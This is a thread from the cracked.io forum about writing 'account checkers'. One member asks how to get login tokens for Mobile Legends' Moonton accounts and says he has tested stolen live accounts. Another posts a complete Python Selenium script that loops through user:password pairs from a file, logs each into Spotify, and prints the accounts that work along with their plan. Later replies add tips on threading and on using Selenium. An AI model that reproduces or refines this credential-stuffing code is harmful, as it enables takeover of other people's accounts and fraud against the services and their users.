Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!

cracked.io | Best Forum Around | Free Premium Accounts




 23006

How to make an account checker using Python ?

by wraithM17 - 20 May, 2019 - 05:47 PM
This post is by a banned member (Eric467) - Unhide
Eric467  
Registered
33
Posts
2
Threads
4 Years of service
#9
Hello, I'm new to this hacking thing and I know this is an old post but I've been trying to make an account checker for a game called Mobile Legends. Mobile Legends have their own sign-in service called "Moonton Accounts", this service will make it easier to get accounts for the game. But there's a problem, "Moonton Accounts" only appear inside of the mobile game.

Is there any way to get login api/token inside of a mobile game so that I can use the api/token for my checker?

Here's how "Moonton Accounts" look like:
https://imgur.com/a/8vN8P4U

I've did a little of researching and I found this video by a guy named 4WSec with the "Moonton Account Checker" in action, I even tried some of the live accounts and it worked. I know for a fact that this account checker idea is possible.
https://asciinema.org/a/241241

Sorry for bad English btw
This post is by a banned member (Vincesu) - Unhide
Vincesu  
Registered
119
Posts
18
Threads
5 Years of service
#10
(14 September, 2019 - 04:33 AM)Eric467 Wrote: Show More
Hello, I'm new to this hacking thing and I know this is an old post but I've been trying to make an account checker for a game called Mobile Legends. Mobile Legends have their own sign-in service called "Moonton Accounts", this service will make it easier to get accounts for the game. But there's a problem, "Moonton Accounts" only appear inside of the mobile game.

Is there any way to get login api/token inside of a mobile game so that I can use the api/token for my checker?

Here's how "Moonton Accounts" look like:
https://imgur.com/a/8vN8P4U

I've did a little of researching and I found this video by a guy named 4WSec with the "Moonton Account Checker" in action, I even tried some of the live accounts and it worked. I know for a fact that this account checker idea is possible.
https://asciinema.org/a/241241

Sorry for bad English btw

if you manage to make it send me a copy Fiesta Fiesta
[img][Image: 2SHcRpL.jpg][/img]
This post is by a banned member (LoliDuck) - Unhide
LoliDuck  
Registered
17
Posts
0
Threads
4 Years of service
#11
from selenium import webdriver
import time
from bs4 import BeautifulSoup
driver = webdriver.Firefox()

def check(user, password):
    """check if the combination works"""
    driver.get("https://accounts.spotify.com/en/login")
    user_elem = driver.find_element_by_id("login-username")
    password_elem = driver.find_element_by_id("login-password")
    button_elem = driver.find_element_by_class_name("btn-green")
    user_elem.clear()
    password_elem.clear()
    user_elem.send_keys(user)
    password_elem.send_keys(password)
    button_elem.click()
    time.sleep(2)
    driver.get("https://www.spotify.com/us/account/overview/")
    parse = BeautifulSoup(driver.page_source, 'html5lib')
    for h3 in parse.find_all('h3', {'class': "product-name"}):
        print('{}:{}:{}'.format(user, password, h3.get_text()))
    driver.delete_all_cookies()
with open('spotify.txt') as s:
    for line in s:
        users, passwords = line.split(':')
        check(users.strip(), passwords.strip())



:)
This post is by a banned member (NXTPLAY) - Unhide
NXTPLAY  
Registered
6
Posts
0
Threads
3 Years of service
#12
amazing
This post is by a banned member (clap) - Unhide
clap  
Godlike
521
Posts
134
Threads
5 Years of service
#13
Note if you're using Threading, make sure you have a Lock.
[Image: RbHa2BA.gif]

Always confirm via PM before dealing with me.
This post is by a banned member (Yagem) - Unhide
Yagem  
Registered
97
Posts
6
Threads
4 Years of service
#14
this is what I need !
This post is by a banned member (Wrafah) - Unhide
Wrafah  
Registered
4
Posts
0
Threads
3 Years of service
#15
Mantao
This post is by a banned member (Dshhs) - Unhide
Dshhs  
Registered
1
Posts
0
Threads
3 Years of service
#16
U should use selenium because u will have some problems with requests

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 2 Guest(s)